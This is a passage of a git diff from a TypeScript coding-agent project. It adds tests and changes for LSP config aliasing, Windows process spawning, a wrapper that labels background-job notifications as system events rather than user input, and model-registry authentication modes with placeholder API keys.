+		// Write an lsp.json that uses the old key name with a command that exists (node)
+		// so resolveCommand doesn't filter it out.
+		const overrideConfig = {
+			servers: {
+				"kotlin-language-server": {
+					command: "node",
+				},
+			},
+		};
+		fs.writeFileSync(
+			path.join(tmpDir, "lsp.json"),
+			JSON.stringify(overrideConfig),
+		);
+
+		// Also add root markers so the server is detected
+		fs.writeFileSync(path.join(tmpDir, "build.gradle.kts"), "");
+
+		const config = loadConfig(tmpDir);
+
+		// The merged config should have kotlin-lsp (new key) with the user's command override
+		const kotlinServer = config.servers["kotlin-lsp"];
+		assert.ok(kotlinServer, "kotlin-lsp should exist in merged config");
+		assert.equal(
+			kotlinServer.command,
+			"node",
+			"command should be overridden from user config via legacy alias",
+		);
+		assert.ok(
+			kotlinServer.fileTypes.includes(".kt"),
+			"fileTypes should be inherited from defaults",
+		);
+
+		// The old key should NOT appear as a separate entry
+		assert.equal(
+			config.servers["kotlin-language-server"],
+			undefined,
+			"legacy key should not appear as separate server",
+		);
+	});
+});
diff --git a/packages/pi-coding-agent/src/core/lsp/lspmux.ts b/packages/pi-coding-agent/src/core/lsp/lspmux.ts
index 05ef13b38..6e01d7807 100644
--- a/packages/pi-coding-agent/src/core/lsp/lspmux.ts
+++ b/packages/pi-coding-agent/src/core/lsp/lspmux.ts
@@ -90,6 +90,9 @@ async function checkServerRunning(binaryPath: string): Promise<boolean> {
 	try {
 		const proc = spawn(binaryPath, ["status"], {
 			stdio: ["ignore", "pipe", "pipe"],
+			// On Windows, the binary may be a .cmd wrapper requiring shell
+			// resolution to avoid ENOENT/EINVAL (#2854).
+			shell: process.platform === "win32",
 		});
 
 		const exited = await Promise.race([
diff --git a/packages/pi-coding-agent/src/core/messages.test.ts b/packages/pi-coding-agent/src/core/messages.test.ts
new file mode 100644
index 000000000..6741da93c
--- /dev/null
+++ b/packages/pi-coding-agent/src/core/messages.test.ts
@@ -0,0 +1,114 @@
+/**
+ * messages.test.ts — Tests for convertToLlm custom message handling.
+ *
+ * Reproduction test for #3026: background job completion notifications
+ * delivered as custom messages must be clearly distinguishable from
+ * user-typed input when converted to LLM messages.
+ */
+
+import test from "node:test";
+import assert from "node:assert/strict";
+import { convertToLlm, type CustomMessage } from "./messages.js";
+
+/** Extract the first content block from a message, asserting array content. */
+function firstTextBlock(msg: ReturnType<typeof convertToLlm>[number]) {
+	const { content } = msg;
+	assert.ok(Array.isArray(content), "Expected content to be an array");
+	const block = content[0];
+	assert.ok(typeof block === "object" && block !== null, "Expected first block to be an object");
+	return block;
+}
+
+test("convertToLlm wraps custom messages with system notification prefix", () => {
+	const customMsg: CustomMessage = {
+		role: "custom",
+		customType: "async_job_result",
+		content: "**Background job done: bg_abc123** (sleep 2, 2.1s)\n\ndone",
+		display: true,
+		timestamp: Date.now(),
+	};
+
+	const result = convertToLlm([customMsg]);
+	assert.equal(result.length, 1);
+	assert.equal(result[0].role, "user");
+
+	// The content must include a system notification wrapper so the LLM
+	// does not confuse it with user input (#3026).
+	const text = firstTextBlock(result[0]);
+	assert.equal(text.type, "text");
+	assert.ok(
+		"text" in text && text.text.includes("[system notification"),
+		"Custom message should be wrapped with system notification marker",
+	);
+});
+
+test("convertToLlm wraps custom messages with array content", () => {
+	const customMsg: CustomMessage = {
+		role: "custom",
+		customType: "bg-shell-status",
+		content: [{ type: "text", text: "Background processes:\n  ✓ bg1 dev-server :3000" }],
+		display: false,
+		timestamp: Date.now(),
+	};
+
+	const result = convertToLlm([customMsg]);
+	assert.equal(result.length, 1);
+	assert.equal(result[0].role, "user");
+
+	const text = firstTextBlock(result[0]);
+	assert.equal(text.type, "text");
+	assert.ok(
+		"text" in text && text.text.includes("[system notification"),
+		"Custom message with array content should be wrapped with system notification marker",
+	);
+});
+
+test("convertToLlm includes customType in notification wrapper", () => {
+	const customMsg: CustomMessage = {
+		role: "custom",
+		customType: "async_job_result",
+		content: "job output here",
+		display: true,
+		timestamp: Date.now(),
+	};
+
+	const result = convertToLlm([customMsg]);
+	const text = firstTextBlock(result[0]);
+	assert.ok(
+		"text" in text && text.text.includes("async_job_result"),
+		"Notification wrapper should include the customType for context",
+	);
+});
+
+test("convertToLlm notification wrapper instructs LLM not to treat as user input", () => {
+	const customMsg: CustomMessage = {
+		role: "custom",
+		customType: "async_job_result",
+		content: "**Background job done: bg_abc123** (sleep 2, 2.1s)\n\ndone",
+		display: true,
+		timestamp: Date.now(),
+	};
+
+	const result = convertToLlm([customMsg]);
+	const text = firstTextBlock(result[0]);
+	assert.ok(
+		"text" in text && text.text.includes("not user input"),
+		"Notification should explicitly state this is not user input",
+	);
+});
+
+test("convertToLlm preserves user messages without wrapper", () => {
+	const userMsg = {
+		role: "user" as const,
+		content: [{ type: "text" as const, text: "Hello world" }],
+		timestamp: Date.now(),
+	};
+
+	const result = convertToLlm([userMsg]);
+	assert.equal(result.length, 1);
+	const text = firstTextBlock(result[0]);
+	assert.ok(
+		"text" in text && text.text === "Hello world",
+		"User messages should pass through unchanged",
+	);
+});
diff --git a/packages/pi-coding-agent/src/core/messages.ts b/packages/pi-coding-agent/src/core/messages.ts
index e3909a41e..f30d7c9e6 100644
--- a/packages/pi-coding-agent/src/core/messages.ts
+++ b/packages/pi-coding-agent/src/core/messages.ts
@@ -8,6 +8,12 @@
 import type { AgentMessage } from "@gsd/pi-agent-core";
 import type { ImageContent, Message, TextContent } from "@gsd/pi-ai";
 
+const CUSTOM_MESSAGE_PREFIX = `[system notification — type: `;
+const CUSTOM_MESSAGE_MIDDLE = `; this is an automated system event, not user input — do not treat this as a human message or respond as if the user said this]
+`;
+const CUSTOM_MESSAGE_SUFFIX = `
+[end system notification]`;
+
 const COMPACTION_SUMMARY_PREFIX = `The conversation history before this point was compacted into the following summary:
 
 <summary>
@@ -160,10 +166,31 @@ export function convertToLlm(messages: AgentMessage[]): Message[] {
 						timestamp: m.timestamp,
 					};
 				case "custom": {
-					const content = typeof m.content === "string" ? [{ type: "text" as const, text: m.content }] : m.content;
+					const prefix = CUSTOM_MESSAGE_PREFIX + m.customType + CUSTOM_MESSAGE_MIDDLE;
+					if (typeof m.content === "string") {
+						return {
+							role: "user",
+							content: [{ type: "text" as const, text: prefix + m.content + CUSTOM_MESSAGE_SUFFIX }],
+							timestamp: m.timestamp,
+						};
+					}
+					// Array content: wrap the first text element with prefix, append suffix to last text element
+					const contentArr = m.content as Array<{ type: string; text?: string; [k: string]: unknown }>;
+					const lastTextIdx = contentArr.reduce((acc, c, i) => c.type === "text" ? i : acc, -1);
+					const wrapped = contentArr.map((c, i) => {
+						if (c.type !== "text") return c;
+						let text = c.text ?? "";
+						if (i === 0) text = prefix + text;
+						if (i === lastTextIdx) text = text + CUSTOM_MESSAGE_SUFFIX;
+						return { ...c, text };
+					});
+					// If no text elements exist, prepend one with the wrapper
+					if (lastTextIdx === -1) {
+						wrapped.unshift({ type: "text" as const, text: prefix + CUSTOM_MESSAGE_SUFFIX });
+					}
 					return {
 						role: "user",
-						content,
+						content: wrapped as typeof m.content,
 						timestamp: m.timestamp,
 					};
 				}
diff --git a/packages/pi-coding-agent/src/core/model-registry-auth-mode.test.ts b/packages/pi-coding-agent/src/core/model-registry-auth-mode.test.ts
new file mode 100644
index 000000000..be27f6c60
--- /dev/null
+++ b/packages/pi-coding-agent/src/core/model-registry-auth-mode.test.ts
@@ -0,0 +1,644 @@
+import assert from "node:assert/strict";
+import { describe, it } from "node:test";
+import type { Api, Model, SimpleStreamOptions, Context, AssistantMessageEventStream } from "@gsd/pi-ai";
+import { getApiProvider } from "@gsd/pi-ai";
+import type { AuthStorage } from "./auth-storage.js";
+import { ModelRegistry } from "./model-registry.js";
+
+function createRegistry(hasAuthFn?: (provider: string) => boolean): ModelRegistry {
+	const authStorage = {
+		setFallbackResolver: () => {},
+		onCredentialChange: () => {},
+		getOAuthProviders: () => [],
+		get: () => undefined,
+		hasAuth: hasAuthFn ?? (() => false),
+		getApiKey: async () => undefined,
+	} as unknown as AuthStorage;
+
+	return new ModelRegistry(authStorage, undefined);
+}
+
+function createProviderModel(id: string, api?: string): NonNullable<Parameters<ModelRegistry["registerProvider"]>[1]["models"]>[number] {
+	return {
+		id,
+		name: id,
+		api: (api ?? "openai-completions") as Api,
+		reasoning: false,
+		input: ["text"],
+		cost: { input: 0, output: 0, cacheRead: 0, cacheWrite: 0 },
+		contextWindow: 128000,
+		maxTokens: 16384,
+	};
+}
+
+function findModel(registry: ModelRegistry, provider: string, id: string): Model<Api> | undefined {
+	return registry.getAvailable().find((m) => m.provider === provider && m.id === id);
+}
+
+function makeModel(provider: string, id: string, api: string): Model<Api> {
+	return {
+		id,
+		name: id,
+		api: api as Api,
+		provider,
+		baseUrl: `${provider}:`,
+		reasoning: false,
+		input: ["text"],
+		cost: { input: 0, output: 0, cacheRead: 0, cacheWrite: 0 },
+		contextWindow: 128000,
+		maxTokens: 16384,
+	};
+}
+
+function makeContext(): Context {
+	return {
+		systemPrompt: "test",
+		messages: [{ role: "user", content: "hello", timestamp: Date.now() }],
+	};
+}
+
+/** No-op streamSimple for tests that need one to pass validation but don't inspect it. */
+const noopStreamSimple = (_model: Model<Api>, _context: Context, _options?: SimpleStreamOptions) => {
+	return {
+		[Symbol.asyncIterator]() { return { next: async () => ({ value: undefined, done: true as const }) }; },
+		result: () => Promise.resolve({ role: "assistant" as const, content: [], api: "test" as Api, provider: "test", model: "test", usage: { input: 0, output: 0, cacheRead: 0, cacheWrite: 0, totalTokens: 0, cost: { input: 0, output: 0, cacheRead: 0, cacheWrite: 0, total: 0 } }, stopReason: "stop" as const, timestamp: Date.now() }),
+		push: () => {},
+		end: () => {},
+	} as unknown as AssistantMessageEventStream;
+};
+
+/** Create a spy streamSimple that captures the options it receives and returns a stub stream. */
+function createStreamSpy(): {
+	streamSimple: (model: Model<Api>, context: Context, options?: SimpleStreamOptions) => AssistantMessageEventStream;
+	getCapturedOptions: () => SimpleStreamOptions | undefined;
+} {
+	let capturedOptions: SimpleStreamOptions | undefined;
+	const streamSimple = (_model: Model<Api>, _context: Context, options?: SimpleStreamOptions) => {
+		capturedOptions = options;
+		// Return a minimal stub that satisfies AssistantMessageEventStream
+		return {
+			[Symbol.asyncIterator]() { return { next: async () => ({ value: undefined, done: true as const }) }; },
+			result: () => Promise.resolve({ role: "assistant" as const, content: [], api: "test" as Api, provider: "test", model: "test", usage: { input: 0, output: 0, cacheRead: 0, cacheWrite: 0, totalTokens: 0, cost: { input: 0, output: 0, cacheRead: 0, cacheWrite: 0, total: 0 } }, stopReason: "stop" as const, timestamp: Date.now() }),
+			push: () => {},
+			end: () => {},
+		} as unknown as AssistantMessageEventStream;
+	};
+	return { streamSimple, getCapturedOptions: () => capturedOptions };
+}
+
+// ─── Registration ─────────────────────────────────────────────────────────────
+
+describe("ModelRegistry authMode — registration", () => {
+	it("registers externalCli provider with streamSimple and without apiKey/oauth", () => {
+		const registry = createRegistry();
+		const spy = createStreamSpy();
+		assert.doesNotThrow(() => {
+			registry.registerProvider("cli-provider", {
+				authMode: "externalCli",
+				baseUrl: "https://cli.local",
+				api: "openai-completions",
+				streamSimple: spy.streamSimple,
+				models: [createProviderModel("cli-model")],
+			});
+		});
+	});
+
+	it("registers none provider with streamSimple and without apiKey/oauth", () => {
+		const registry = createRegistry();
+		const spy = createStreamSpy();
+		assert.doesNotThrow(() => {
+			registry.registerProvider("none-provider", {
+				authMode: "none",
+				baseUrl: "http://localhost:11434",
+				api: "openai-completions",
+				streamSimple: spy.streamSimple,
+				models: [createProviderModel("local-model")],
+			});
+		});
+	});
+
+	it("rejects apiKey provider without apiKey or oauth — message mentions authMode", () => {
+		const registry = createRegistry();
+		assert.throws(() => {
+			registry.registerProvider("apikey-provider", {
+				authMode: "apiKey",
+				baseUrl: "https://api.local",
+				api: "openai-completions",
+				models: [createProviderModel("model")],
+			});
+		}, (err: Error) => {
+			assert.ok(err.message.includes("authMode"), "error message must mention authMode");
+			assert.ok(err.message.includes("externalCli"), "error message must suggest externalCli");
+			return true;
+		});
+	});
+
+	it("rejects provider with no authMode and no apiKey/oauth (defaults to apiKey)", () => {
+		const registry = createRegistry();
+		assert.throws(() => {
+			registry.registerProvider("bare-provider", {
+				baseUrl: "https://api.local",
+				api: "openai-completions",
+				models: [createProviderModel("model")],
+			});
+		}, (err: Error) => {
+			assert.ok(err.message.includes("authMode"), "error message must mention authMode");
+			return true;
+		});
+	});
+
+	it("rejects externalCli provider without streamSimple", () => {
+		const registry = createRegistry();
+		assert.throws(() => {
+			registry.registerProvider("cli-no-stream", {
+				authMode: "externalCli",
+				baseUrl: "https://cli.local",
+				api: "openai-completions",
+				models: [createProviderModel("model")],
+			});
+		}, (err: Error) => {
+			assert.ok(err.message.includes("streamSimple"), "error message must mention streamSimple");
+			assert.ok(err.message.includes("externalCli"), "error message must mention authMode");
+			return true;
+		});
+	});
+
+	it("rejects none provider without streamSimple", () => {
+		const registry = createRegistry();
+		assert.throws(() => {
+			registry.registerProvider("none-no-stream", {
+				authMode: "none",
+				baseUrl: "http://localhost:11434",
+				api: "openai-completions",
+				models: [createProviderModel("model")],
+			});
+		}, (err: Error) => {
+			assert.ok(err.message.includes("streamSimple"), "error message must mention streamSimple");
+			assert.ok(err.message.includes("none"), "error message must mention authMode");
+			return true;
+		});
+	});
+
+	it("rejects externalCli provider that also sets apiKey", () => {
+		const registry = createRegistry();
+		const spy = createStreamSpy();
+		assert.throws(() => {
+			registry.registerProvider("cli-with-key", {
+				authMode: "externalCli",
+				baseUrl: "https://cli.local",
+				api: "openai-completions",
+				apiKey: "SHOULD_NOT_EXIST",
+				streamSimple: spy.streamSimple,
+				models: [createProviderModel("model")],
+			});
+		}, (err: Error) => {
+			assert.ok(err.message.includes("apiKey"), "error message must mention apiKey");
+			assert.ok(err.message.includes("externalCli"), "error message must mention authMode");
+			return true;
+		});
+	});
+
+	it("rejects none provider that also sets apiKey", () => {
+		const registry = createRegistry();
+		const spy = createStreamSpy();
+		assert.throws(() => {
+			registry.registerProvider("none-with-key", {
+				authMode: "none",
+				baseUrl: "http://localhost:11434",
+				api: "openai-completions",
+				apiKey: "SHOULD_NOT_EXIST",
+				streamSimple: spy.streamSimple,
+				models: [createProviderModel("model")],
+			});
+		}, (err: Error) => {
+			assert.ok(err.message.includes("apiKey"), "error message must mention apiKey");
+			assert.ok(err.message.includes("none"), "error message must mention authMode");
+			return true;
+		});
+	});
+});
+
+// ─── getProviderAuthMode ──────────────────────────────────────────────────────
+
+describe("ModelRegistry authMode — getProviderAuthMode", () => {
+	it("returns apiKey for unregistered (built-in) providers", () => {
+		const registry = createRegistry();
+		assert.equal(registry.getProviderAuthMode("anthropic"), "apiKey");
+	});
+
+	it("returns explicit authMode when set", () => {
+		const registry = createRegistry();
+		registry.registerProvider("cli", {
+			authMode: "externalCli",
+			baseUrl: "https://cli.local",
+			api: "openai-completions",
+			streamSimple: noopStreamSimple,
+			models: [createProviderModel("m")],
+		});
+		assert.equal(registry.getProviderAuthMode("cli"), "externalCli");
+	});
+
+	it("returns none when authMode is none", () => {
+		const registry = createRegistry();
+		registry.registerProvider("local", {
+			authMode: "none",
+			baseUrl: "http://localhost:11434",
+			api: "openai-completions",
+			streamSimple: noopStreamSimple,
+			models: [createProviderModel("m")],
+		});
+		assert.equal(registry.getProviderAuthMode("local"), "none");
+	});
+});
+
+// ─── isProviderRequestReady ───────────────────────────────────────────────────
+
+describe("ModelRegistry authMode — isProviderRequestReady", () => {
+	it("returns true for externalCli without stored auth", () => {
+		const registry = createRegistry(() => false);
+		registry.registerProvider("cli", {
+			authMode: "externalCli",
+			baseUrl: "https://cli.local",
+			api: "openai-completions",
+			streamSimple: noopStreamSimple,
+			models: [createProviderModel("m")],
+		});
+		assert.equal(registry.isProviderRequestReady("cli"), true);
+	});
+
+	it("returns true for none without stored auth", () => {
+		const registry = createRegistry(() => false);
+		registry.registerProvider("local", {
+			authMode: "none",
+			baseUrl: "http://localhost:11434",
+			api: "openai-completions",
+			streamSimple: noopStreamSimple,
+			models: [createProviderModel("m")],
+		});
+		assert.equal(registry.isProviderRequestReady("local"), true);
+	});
+
+	it("returns false for apiKey provider without stored auth", () => {
+		const registry = createRegistry(() => false);
+		assert.equal(registry.isProviderRequestReady("anthropic"), false);
+	});
+
+	it("returns true for apiKey provider with stored auth", () => {
+		const registry = createRegistry(() => true);
+		assert.equal(registry.isProviderRequestReady("anthropic"), true);
+	});
+});
+
+// ─── isReady callback ─────────────────────────────────────────────────────────
+
+describe("ModelRegistry authMode — isReady callback", () => {
+	it("calls isReady and returns its result for externalCli provider", () => {
+		const registry = createRegistry(() => false);
+		registry.registerProvider("cli-down", {
+			authMode: "externalCli",
+			baseUrl: "https://cli.local",
+			api: "openai-completions",
+			streamSimple: noopStreamSimple,
+			isReady: () => false,
+			models: [createProviderModel("m")],
+		});
+		assert.equal(registry.isProviderRequestReady("cli-down"), false);
+	});
+
+	it("calls isReady for apiKey provider (overrides hasAuth)", () => {
+		const registry = createRegistry(() => true);
+		registry.registerProvider("strict-provider", {
+			apiKey: "MY_KEY",
+			baseUrl: "https://api.local",
+			api: "openai-completions",
+			isReady: () => false,
+			models: [createProviderModel("m")],
+		});
+		assert.equal(registry.isProviderRequestReady("strict-provider"), false);
+	});
+
+	it("isReady returning true makes provider available", () => {
+		const registry = createRegistry(() => false);
+		registry.registerProvider("healthy-cli", {
+			authMode: "externalCli",
+			baseUrl: "https://cli.local",
+			api: "openai-completions",
+			streamSimple: noopStreamSimple,
+			isReady: () => true,
+			models: [createProviderModel("m")],
+		});
+		assert.equal(registry.isProviderRequestReady("healthy-cli"), true);
+	});
+
+	it("falls through to default behavior when isReady not provided", () => {
+		const registry = createRegistry(() => false);
+		registry.registerProvider("no-callback", {
+			authMode: "externalCli",
+			baseUrl: "https://cli.local",
+			api: "openai-completions",
+			streamSimple: noopStreamSimple,
+			models: [createProviderModel("m")],
+		});
+		// externalCli without isReady → true (default)
+		assert.equal(registry.isProviderRequestReady("no-callback"), true);
+	});
+});
+
+// ─── getAvailable ─────────────────────────────────────────────────────────────
+
+describe("ModelRegistry authMode — getAvailable", () => {
+	it("includes externalCli models without stored auth", () => {
+		const registry = createRegistry(() => false);
+		registry.registerProvider("cli", {
+			authMode: "externalCli",
+			baseUrl: "https://cli.local",
+			api: "openai-completions",
+			streamSimple: noopStreamSimple,
+			models: [createProviderModel("cli-model")],
+		});
+		assert.ok(findModel(registry, "cli", "cli-model"));
+	});
+
+	it("includes none models without stored auth", () => {
+		const registry = createRegistry(() => false);
+		registry.registerProvider("local", {
+			authMode: "none",
+			baseUrl: "http://localhost:11434",
+			api: "openai-completions",
+			streamSimple: noopStreamSimple,
+			models: [createProviderModel("local-model")],
+		});
+		assert.ok(findModel(registry, "local", "local-model"));
+	});
+
+	it("excludes externalCli models when isReady returns false", () => {
+		const registry = createRegistry(() => false);
+		registry.registerProvider("cli-down", {
+			authMode: "externalCli",
+			baseUrl: "https://cli.local",
+			api: "openai-completions",
+			streamSimple: noopStreamSimple,
+			isReady: () => false,
+			models: [createProviderModel("m")],
+		});
+		assert.equal(findModel(registry, "cli-down", "m"), undefined);
+	});
+
+	it("excludes apiKey models without stored auth", () => {
+		const registry = createRegistry(() => false);
+		const available = registry.getAvailable();
+		assert.equal(available.length, 0);
+	});
+});
+
+// ─── getApiKey ────────────────────────────────────────────────────────────────
+
+describe("ModelRegistry authMode — getApiKey", () => {
+	it("returns undefined for externalCli provider", async () => {
+		const registry = createRegistry();
+		registry.registerProvider("cli", {
+			authMode: "externalCli",
+			baseUrl: "https://cli.local",
+			api: "openai-completions",
+			streamSimple: noopStreamSimple,
+			models: [createProviderModel("m")],
+		});
+		const model = registry.getAll().find((m) => m.provider === "cli")!;
+		assert.equal(await registry.getApiKey(model), undefined);
+	});
+
+	it("returns undefined for none provider", async () => {
+		const registry = createRegistry();
+		registry.registerProvider("local", {
+			authMode: "none",
+			baseUrl: "http://localhost:11434",
+			api: "openai-completions",
+			streamSimple: noopStreamSimple,
+			models: [createProviderModel("m")],
+		});
+		const model = registry.getAll().find((m) => m.provider === "local")!;
+		assert.equal(await registry.getApiKey(model), undefined);
+	});
+
+	it("delegates to authStorage for apiKey provider", async () => {
+		const registry = createRegistry();
+		const key = await registry.getApiKeyForProvider("anthropic");
+		assert.equal(key, undefined);
+	});
+});
+
+// ─── streamSimple apiKey stripping ────────────────────────────────────────────
+
+describe("ModelRegistry authMode — streamSimple apiKey boundary", () => {
+	it("strips apiKey from options for externalCli provider", () => {
+		const registry = createRegistry();
+		const spy = createStreamSpy();
+		const apiType = `ext-cli-strip-${Date.now()}`;
+
+		registry.registerProvider("cli-strip", {
+			authMode: "externalCli",
+			baseUrl: "https://cli.local",
+			api: apiType as Api,
+			streamSimple: spy.streamSimple,
+			models: [createProviderModel("m", apiType)],
+		});
+
+		const provider = getApiProvider(apiType as Api);
+		assert.ok(provider, "provider must be registered in api registry");
+
+		provider.streamSimple(
+			makeModel("cli-strip", "m", apiType),
+			makeContext(),
+			{ apiKey: "should-be-stripped", maxTokens: 1024 } as SimpleStreamOptions,
+		);
+
+		const captured = spy.getCapturedOptions();
+		assert.ok(captured, "streamSimple must have been called");
+		assert.equal("apiKey" in captured, false, "apiKey must not exist in options for externalCli provider");
+		assert.equal(captured.maxTokens, 1024, "other options must pass through");
+	});
+
+	it("strips apiKey from options for none provider", () => {
+		const registry = createRegistry();
+		const spy = createStreamSpy();
+		const apiType = `none-strip-${Date.now()}`;
+
+		registry.registerProvider("none-strip", {
+			authMode: "none",
+			baseUrl: "http://localhost:11434",
+			api: apiType as Api,
+			streamSimple: spy.streamSimple,
+			models: [createProviderModel("m", apiType)],
+		});
+
+		const provider = getApiProvider(apiType as Api);
+		assert.ok(provider, "provider must be registered in api registry");
+
+		provider.streamSimple(
+			makeModel("none-strip", "m", apiType),
+			makeContext(),
+			{ apiKey: "should-be-stripped", maxTokens: 2048 } as SimpleStreamOptions,
+		);
+
+		const captured = spy.getCapturedOptions();
+		assert.ok(captured, "streamSimple must have been called");
+		assert.equal("apiKey" in captured, false, "apiKey must not exist in options for none provider");
+		assert.equal(captured.maxTokens, 2048, "other options must pass through");
+	});
+
+	it("preserves apiKey in options for apiKey provider", () => {
+		const registry = createRegistry();
+		const spy = createStreamSpy();
+		const apiType = `apikey-preserve-${Date.now()}`;
+
+		registry.registerProvider("apikey-preserve", {
+			apiKey: "MY_KEY",
+			baseUrl: "https://api.local",
+			api: apiType as Api,
+			streamSimple: spy.streamSimple,
+			models: [createProviderModel("m", apiType)],
+		});
+
+		const provider = getApiProvider(apiType as Api);
+		assert.ok(provider, "provider must be registered in api registry");
+
+		provider.streamSimple(
+			makeModel("apikey-preserve", "m", apiType),
+			makeContext(),
+			{ apiKey: "sk-real-key", maxTokens: 4096 } as SimpleStreamOptions,
+		);
+
+		const captured = spy.getCapturedOptions();
+		assert.ok(captured, "streamSimple must have been called");
+		assert.equal(captured.apiKey, "sk-real-key", "apiKey must be preserved for apiKey provider");
+		assert.equal(captured.maxTokens, 4096, "other options must pass through");
+	});
+
+	it("handles undefined options for externalCli provider", () => {
+		const registry = createRegistry();
+		const spy = createStreamSpy();
+		const apiType = `ext-cli-undef-${Date.now()}`;
+
+		registry.registerProvider("cli-undef", {
+			authMode: "externalCli",
+			baseUrl: "https://cli.local",
+			api: apiType as Api,
+			streamSimple: spy.streamSimple,
+			models: [createProviderModel("m", apiType)],
+		});
+
+		const provider = getApiProvider(apiType as Api);
+		assert.ok(provider, "provider must be registered in api registry");
+
+		provider.streamSimple(
+			makeModel("cli-undef", "m", apiType),
+			makeContext(),
+			undefined,
+		);
+
+		const captured = spy.getCapturedOptions();
+		assert.ok(captured !== undefined, "streamSimple must have been called");
+		assert.equal("apiKey" in captured, false, "apiKey must not exist even when options is undefined");
+	});
+
+	it("strips apiKey but preserves signal and other fields for externalCli", () => {
+		const registry = createRegistry();
+		const spy = createStreamSpy();
+		const apiType = `ext-cli-fields-${Date.now()}`;
+		const abortController = new AbortController();
+
+		registry.registerProvider("cli-fields", {
+			authMode: "externalCli",
+			baseUrl: "https://cli.local",
+			api: apiType as Api,
+			streamSimple: spy.streamSimple,
+			models: [createProviderModel("m", apiType)],
+		});
+
+		const provider = getApiProvider(apiType as Api);
+		assert.ok(provider, "provider must be registered in api registry");
+
+		provider.streamSimple(
+			makeModel("cli-fields", "m", apiType),
+			makeContext(),
+			{ apiKey: "strip-me", maxTokens: 8192, signal: abortController.signal, reasoning: "high" } as SimpleStreamOptions,
+		);
+
+		const captured = spy.getCapturedOptions();
+		assert.ok(captured, "streamSimple must have been called");
+		assert.equal("apiKey" in captured, false, "apiKey must be stripped");
+		assert.equal(captured.maxTokens, 8192, "maxTokens must pass through");
+		assert.equal(captured.signal, abortController.signal, "signal must pass through");
+		assert.equal((captured as Record<string, unknown>).reasoning, "high", "reasoning must pass through");
+	});
+});
+
+// ─── Provider-scoped stream routing (#2533) ───────────────────────────────────
+
+describe("ModelRegistry authMode — provider-scoped stream routing", () => {
+	it("does not clobber built-in stream handler when custom provider uses same api", () => {
+		const registry = createRegistry(() => true);
+		const customSpy = createStreamSpy();
+
+		// Register a custom provider with the same API type as a built-in (anthropic-messages).
+		// This simulates the claude-code-cli extension registering with api: "anthropic-messages".
+		registry.registerProvider("custom-cli", {
+			authMode: "externalCli",
+			baseUrl: "local://custom",
+			api: "anthropic-messages",
+			streamSimple: customSpy.streamSimple,
+			models: [createProviderModel("custom-model", "anthropic-messages")],
+		});
+
+		// The built-in anthropic-messages provider should still be accessible
+		// when calling streamSimple with a model from the built-in provider.
+		const provider = getApiProvider("anthropic-messages" as Api);
+		assert.ok(provider, "anthropic-messages provider must still be registered");
+
+		// Call with a built-in anthropic model — should NOT hit the custom spy.
+		// The built-in handler will throw (no API key), which proves the routing
+		// correctly delegates to the built-in instead of the custom handler.
+		assert.throws(
+			() => provider.streamSimple(
+				makeModel("anthropic", "claude-sonnet-4-6", "anthropic-messages"),
+				makeContext(),
+				{ maxTokens: 4096 } as SimpleStreamOptions,
+			),
+			(err: Error) => err.message.includes("API key"),
+			"built-in Anthropic handler must be invoked (throws because no API key in tests)",
+		);
+
+		assert.equal(
+			customSpy.getCapturedOptions(),
+			undefined,
+			"custom provider's streamSimple must NOT be called for anthropic provider models",
+		);
+	});
+
+	it("routes to custom provider when model.provider matches", () => {
+		const registry = createRegistry(() => true);
+		const customSpy = createStreamSpy();
+
+		registry.registerProvider("custom-cli", {
+			authMode: "externalCli",
+			baseUrl: "local://custom",
+			api: "anthropic-messages",
+			streamSimple: customSpy.streamSimple,
+			models: [createProviderModel("custom-model", "anthropic-messages")],
+		});
+
+		const provider = getApiProvider("anthropic-messages" as Api);
+		assert.ok(provider);
+
+		// Call with the custom provider's model — should hit the custom spy
+		provider.streamSimple(
+			makeModel("custom-cli", "custom-model", "anthropic-messages"),
+			makeContext(),
+			{ maxTokens: 2048 } as SimpleStreamOptions,
+		);
+
+		const captured = customSpy.getCapturedOptions();
+		assert.ok(captured, "custom provider's streamSimple must be called for its own models");
+		assert.equal(captured.maxTokens, 2048);
+	});
+});
diff --git a/packages/pi-coding-agent/src/core/model-registry.ts b/packages/pi-coding-agent/src/core/model-registry.ts
index 08766af24..762e459cc 100644
--- a/packages/pi-coding-agent/src/core/model-registry.ts
+++ b/packages/pi-coding-agent/src/core/model-registry.ts
@@ -4,8 +4,10 @@
 
 import {
 	type Api,
+	applyCapabilityPatches,
 	type AssistantMessageEventStream,
 	type Context,
+	getApiProvider,
 	getModels,
 	getProviders,
 	type KnownProvider,
@@ -28,6 +30,7 @@ import { ModelDiscoveryCache } from "./discovery-cache.js";
 import type { DiscoveredModel, DiscoveryResult } from "./model-discovery.js";
 import { getDefaultTTL, getDiscoverableProviders, getDiscoveryAdapter } from "./model-discovery.js";
 import { clearConfigValueCache, resolveConfigValue, resolveHeaders } from "./resolve-config-value.js";
+import { isLocalModel } from "./local-model-check.js";
 
 const Ajv = (AjvModule as any).default || AjvModule;
 const ajv = new Ajv();
@@ -128,6 +131,8 @@ ajv.addSchema(ModelsConfigSchema, "ModelsConfig");
 
 type ModelsConfig = Static<typeof ModelsConfigSchema>;
 
+export type ProviderAuthMode = "apiKey" | "oauth" | "externalCli" | "none";
+
 /** Provider override config (baseUrl, headers, apiKey) without custom models */
 interface ProviderOverride {
 	baseUrl?: string;
@@ -230,7 +235,7 @@ export class ModelRegistry {
 
 	constructor(
 		readonly authStorage: AuthStorage,
-		private modelsJsonPath: string | undefined = join(getAgentDir(), "models.json"),
+		readonly modelsJsonPath: string | undefined = join(getAgentDir(), "models.json"),
 	) {
 		this.discoveryCache = new ModelDiscoveryCache();
 
@@ -243,6 +248,9 @@ export class ModelRegistry {
 			return undefined;
 		});
 
+		// Refresh models when credentials change (e.g., OAuth token refresh with new model limits)
+		this.authStorage.onCredentialChange(() => this.refresh());
+
 		// Load models
 		this.loadModels();
 	}
@@ -297,7 +305,10 @@ export class ModelRegistry {
 			}
 		}
 
-		this.models = combined;
+		// Apply capability patches so custom/discovered/extension models get
+		// capabilities (supportsXhigh, supportsServiceTier, etc.) that the
+		// static pi-ai registry applies at module load for built-in models.
+		this.models = applyCapabilityPatches(combined);
 	}
 
 	/** Load built-in models and apply provider/model overrides */
@@ -456,6 +467,18 @@ export class ModelRegistry {
 				this.customProviderApiKeys.set(providerName, providerConfig.apiKey);
 			}
 
+			// Register custom providers so isProviderRequestReady() can find
+			// them (#3531). Without this, models.json providers with apiKey
+			// fail the auth check and are invisible to the fallback resolver.
+			if (!this.registeredProviders.has(providerName)) {
+				this.registeredProviders.set(providerName, {
+					authMode: providerConfig.apiKey ? "apiKey" : "none",
+					apiKey: providerConfig.apiKey,
